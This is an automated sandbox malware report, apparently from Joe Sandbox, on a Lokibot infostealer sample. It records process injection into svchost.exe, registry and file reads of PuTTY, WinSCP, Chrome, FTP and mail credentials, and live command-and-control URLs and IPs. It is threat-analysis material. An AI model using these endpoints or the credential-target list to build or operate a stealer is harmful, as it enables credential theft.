Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B4F0F2
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B4F3F3
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B437EF
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B43B12
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B4BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	1_2_00403D74

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00AE49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AE49A0

Source: C:\Windows\SysWOW64\svchost.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: svchost.exe, 00000001.00000002.2918386382.0000000003200000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\vsf098633534.exe

API call chain: ExitProcess graph end node

graph_0-103986

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B53F09 BlockInput,

0_2_00B53F09

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00AE3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AE3B3A

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B15A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00B15A7C

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00AE4B37 LoadLibraryA,GetProcAddress,

0_2_00AE4B37

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00CE34A0 mov eax, dword ptr fs:[00000030h]	0_2_00CE34A0
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00CE3500 mov eax, dword ptr fs:[00000030h]	0_2_00CE3500
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00CE1E70 mov eax, dword ptr fs:[00000030h]	0_2_00CE1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]	1_2_0040317B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D93060 mov eax, dword ptr fs:[00000030h]	1_2_00D93060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D93060 mov eax, dword ptr fs:[00000030h]	1_2_00D93060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D93060 mov eax, dword ptr fs:[00000030h]	1_2_00D93060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D93060 mov eax, dword ptr fs:[00000030h]	1_2_00D93060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D94410 mov eax, dword ptr fs:[00000030h]	1_2_00D94410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D94410 mov eax, dword ptr fs:[00000030h]	1_2_00D94410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D93540 mov eax, dword ptr fs:[00000030h]	1_2_00D93540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D93540 mov eax, dword ptr fs:[00000030h]	1_2_00D93540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D93540 mov eax, dword ptr fs:[00000030h]	1_2_00D93540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D956A0 mov eax, dword ptr fs:[00000030h]	1_2_00D956A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D956A0 mov ecx, dword ptr fs:[00000030h]	1_2_00D956A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D94610 mov eax, dword ptr fs:[00000030h]	1_2_00D94610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D94610 mov eax, dword ptr fs:[00000030h]	1_2_00D94610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D94610 mov eax, dword ptr fs:[00000030h]	1_2_00D94610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D94610 mov eax, dword ptr fs:[00000030h]	1_2_00D94610

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B380A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00B380A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0A124 SetUnhandledExceptionFilter,	0_2_00B0A124
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B0A155
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D95848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00D95848
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D933C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	1_2_00D933C0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.64.1 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\vsf098633534.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\vsf098633534.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E19008

Jump to behavior

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B387B1 LogonUserW,

0_2_00B387B1

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00AE3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AE3B3A

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00AE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00AE48D7

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B44C27 mouse_event,

0_2_00B44C27

Source: C:\Users\user\Desktop\vsf098633534.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\vsf098633534.exe"

Jump to behavior

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B37CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00B37CAF

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B3874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00B3874B

Source: vsf098633534.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: vsf098633534.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B0862B cpuid

0_2_00B0862B

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B14E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00B14E87

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B21E06 GetUserNameW,

0_2_00B21E06

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B13F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00B13F3A

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00AE49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AE49A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vsf098633534.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7080, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.2918405365.0000000003212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: PopPassword		1_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe	Code function: SmtpPassword		1_2_0040D069

Source: vsf098633534.exe	Binary or memory string: WIN_81
Source: vsf098633534.exe	Binary or memory string: WIN_XP
Source: vsf098633534.exe	Binary or memory string: WIN_XPe
Source: vsf098633534.exe	Binary or memory string: WIN_VISTA
Source: vsf098633534.exe	Binary or memory string: WIN_7
Source: vsf098633534.exe	Binary or memory string: WIN_8
Source: vsf098633534.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B56283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00B56283
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B56747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00B56747
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D96AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	1_2_00D96AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D96BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	1_2_00D96BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D96B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	1_2_00D96B60

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	3 Windows Service	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
vsf098633534.exe	30%	Virustotal		Browse
vsf098633534.exe	29%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label	Link
http://touxzw.ir/sccc/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
touxzw.ir	104.21.64.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://touxzw.ir/sccc/five/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	svchost.exe, svchost.exe, 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.64.1	touxzw.ir	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1619628
Start date and time:	2025-02-20 03:42:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vsf098633534.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/6@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 58 Number of non-executed functions: 276
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:43:16	API Interceptor	61x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.64.1	laser.ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	UPDATED SOA.pdf.exe	Get hash	malicious	FormBook	Browse	www.shlomi.app/t3l4/
	QUOTE OF DRY DOCK REPAIR.exe	Get hash	malicious	FormBook	Browse	www.arryongro-nambe.live/ljgq/
	QUOTATION NO REQ-19-000640.exe	Get hash	malicious	FormBook	Browse	www.askvtwv8.top/2875/
	Revised Order Confirmation.exe	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/hbfq/
	UPIlkrNpsh.exe	Get hash	malicious	Unknown	Browse	xerecao.cc/
	engine.ps1	Get hash	malicious	FormBook	Browse	www.askvtwv8.top/b8fe/
	laserrrrrrrr.ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	new quotation.exe	Get hash	malicious	FormBook	Browse	www.shlomi.app/378r/
	PO 87877889X,pdf.Vbs.vbs	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
touxzw.ir	scan_0219025_pdf.exe	Get hash	malicious	Lokibot	Browse	104.21.112.1
	scan_07022025_pdf.exe	Get hash	malicious	DarkTortilla, Lokibot	Browse	104.21.112.1
	specs_916351_xlsx.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	specs_00235_xlsx.exe	Get hash	malicious	Lokibot	Browse	104.21.32.1
	specs_12788_xls.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	LEmJJ87mUQ.exe	Get hash	malicious	Lokibot	Browse	172.67.134.88
	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3
	zxalphamn.doc	Get hash	malicious	Lokibot	Browse	188.114.96.9
	DRAFT DOC2406656.bat.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3
	Comprobante.PDF867564575869708776565434576897.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	RECEIPT ATTACHMENT.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	malhex.bin.exe	Get hash	malicious	IcedID	Browse	104.18.36.19
	testfile.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	malhex.bin.exe	Get hash	malicious	IcedID	Browse	172.64.151.237
	Staff-Changes.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	104.17.248.203
	customs declaration form (china translate).exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	http://harnessmaster.com.au/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://metaworldlogin.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	172.64.151.8
	https://appealinfringementmarketingflare.vercel.app/3a36efff&cf6=5a&1eG=K9dHF3da4b=D400e	Get hash	malicious	HTMLPhisher	Browse	172.67.75.166
	https://appealinfringementmarketingflare.vercel.app/3a36efff&cf6=5a&1eG=K9dHF3da4b=D400e.html	Get hash	malicious	HTMLPhisher	Browse	104.26.5.15

Process:	C:\Users\user\Desktop\vsf098633534.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5804687143373863
Encrypted:	false
SSDEEP:	768:X9QA+dD/VzCaynKpACXECY9wVsMQZBRRq26dS3xlO:uA+R//sdq264+
MD5:	F8A06F830B97695FD12EFBCE21CE7AC6
SHA1:	6904AF1CEA82628BF200F6EA0220A1C6B31D3D20
SHA-256:	433D1EDB99371C9ED01664D397427B5F4DC75E2924EA50747D06B5442F22D4D5
SHA-512:	9007897B1CF89B5769A9B81F6075B4C61B1E1D99736477615AA36EF8864B40CD6BF7C4590346F75109C4377C7066DBAF77BB7C16A6F598E866364066CE332475
Malicious:	false
Reputation:	low
Preview:	&n##.tsu.'suuu&$&&&&# #!t. t&&&&&& ./"#."t/ #&&&&&& ./"r. tw!$&&&&&& ./##..t. s&&&&&& ./"#.wt/ #&&&&&& ./"r.utw u&&&&&& ./##.st.%%&&&&&& ./"#/&t/%$&&&&&& ./"r/$tw$s&&&&&& ./##/"t. "&&&&&& ./"#/ t/ u&&&&&& ./"r/.tw u&&&&&& ./##/w%%u& ./"#/ut/ s&&&&&& ./.r""pppppptw!"&&&&&& .//#" ppppppt. "&&&&&& ./.#".ppppppt/ u&&&&&& ./.r"wpppppptw u&&&&&& .//#"uppppppt.$s&&&&&& ./.#"sppppppt/ "&&&&&& ./.r#&pppppptw u&&&&&& .//##$ppppppt. u&&&&&& ./.##"pppppp%%u/ ./.r# pppppptw!#&&&&&& ./##r&t.!%&&&&&& ./"#r$t/ #&&&&&& ./"rr"tw!$&&&&&& ./##r t.%%&&&&&& ./"#r.t/%$&&&&&& ./"rrwtw$s&&&&&& ./##rut. "&&&&&& ./"#rst/ u&&&&&& ./"rs&tw u&&&&&& ./##s$%%u& ./"#s"t/ '&&&&&& ./.r .pppppptw "&&&&&& .//# wppppppt.! &&&&&& ./.# uppppppt/ '&&&&&& ./.r spppppptw!&&&&&&& .//#!&ppppppt. /&&&&&& ./.#!$ppppppt/%%&&&&&& ./.r!"pppppptw%$&&&&&& .//#! ppppppt.$s&&&&&& ./.#!.ppppppt/ "&&&&&& ./.r!wpppppptw u&&&&&& .//#!uppppppt. u&&&&&& ./.#!spppppp%%u/ ./"r.&tw!%&&&&&& ./##w&t. .

C:\Users\user\AppData\Local\Temp\aut1863.tmp

Download File

Process:	C:\Users\user\Desktop\vsf098633534.exe
File Type:	data
Category:	dropped
Size (bytes):	82796
Entropy (8bit):	7.9644146196240815
Encrypted:	false
SSDEEP:	1536:bUIrCdWSHl8g2gj9dkyVbX0tVpG1EaUT90/hvaQDDgpTJjPFLQ9Q44fuF8JAXto4:boASF8g2CdMVYEaUOiQD4JZ7uKJ+V
MD5:	1629D0FD2FDF9323DCFAD3E1959AEA32
SHA1:	D0E2C6A3449E60F9318BD356B63BF0E8503463ED
SHA-256:	08DA94BDED104007900CCAFBE84339D4CEFF941116A9BE03DBAF6484085246C8
SHA-512:	CEAE1D2342E23E243CCEA3423B35882A936ED54B1A767DF9738E1DCF8A6197D736FCA59AB065B9CFE64162D13739D9293121982F862506A50959CC622D192B20
Malicious:	false
Reputation:	low
Preview:	EA06......8..=..J..j.....Z....^.D.T.TP.2.Q....y....{..2.Z..?..b...^p.8..[7.N...]<..d...Mw.Hl.....=...M.]Z.M.4:M:.....^....(..7....zj..Fo.......9..z(.~G.....h.{........g.....+.......fk.........~..w...}.>.E.K..&.{.7.......t....P\|`.....].cH...Q0..lj..5"iD.U..Z%K.M...v:5.kX..".P.b.T...=.-.kM.U.B..........R....T...5ZU..%.0j.J.h...P.>.tJ...[......Ujt`....g.......Q@&1q.Tj...o..O..n.Y=Ry3...@,T....&....g.......M6....@.....V....L.c..Q..[4..O6P.6..`.9.zx.............E..V.m....B.&cj.^...H.z....B.E.k(3....U....R_B....L.F....f..}..0.Ph.}.>Y].S@..N.y../......ah.[.....R...g..f..}...<R.....U..T.mh.`.PWz-6.I.r)..X...T..U.....H.U..g...\|b.u.Ej.C..B.@.\Z@.Y=?.)..1..%..x..)...#7.........h .....T.4..{.\.T.P\.V.K..j@.G..G.Q(.....T.q.5...o>.T.....K..36..w.).T....g...&.n.4.t...t......wy......................W.np{.NG...P;1......X.}xu.}...).]dS.Q.u.4.6....b6..F.9...n.....B...g.^.Q*\>%v..Fw<u.<..... .v./[..w...3a..R.4\|...r.ig......!X.c.F..Ll.N..j.......i......

C:\Users\user\AppData\Local\Temp\aut18B2.tmp

Download File

Process:	C:\Users\user\Desktop\vsf098633534.exe
File Type:	data
Category:	dropped
Size (bytes):	9768
Entropy (8bit):	7.627427881699107
Encrypted:	false
SSDEEP:	192:6JVLuam+BbAnlvfd+lVxo9K1nlNaz1ljAQDudWRefOL4FA8bx7Z5KNyQybSX:67uamwbMltmoQnlg19AQKdvpFA8bx7ZA
MD5:	05147AF906C977E68C80626AE266E639
SHA1:	359960C667DB68AC936F80D3F2DE5B5341BC6A05
SHA-256:	F4E36C0D1C9013ACA9E5C3AF8FCB23345032F01783625FBA5835341105A86197
SHA-512:	9AA3C61DD840B26519418EEBCCA6C8E5B92AA818E9CF2E4B1919EE5585BEF5518F00FF03D35636550ED6E6C3D3C753D2850D82DBDE39C179EBCD24F6B513A4EB
Malicious:	false
Reputation:	low
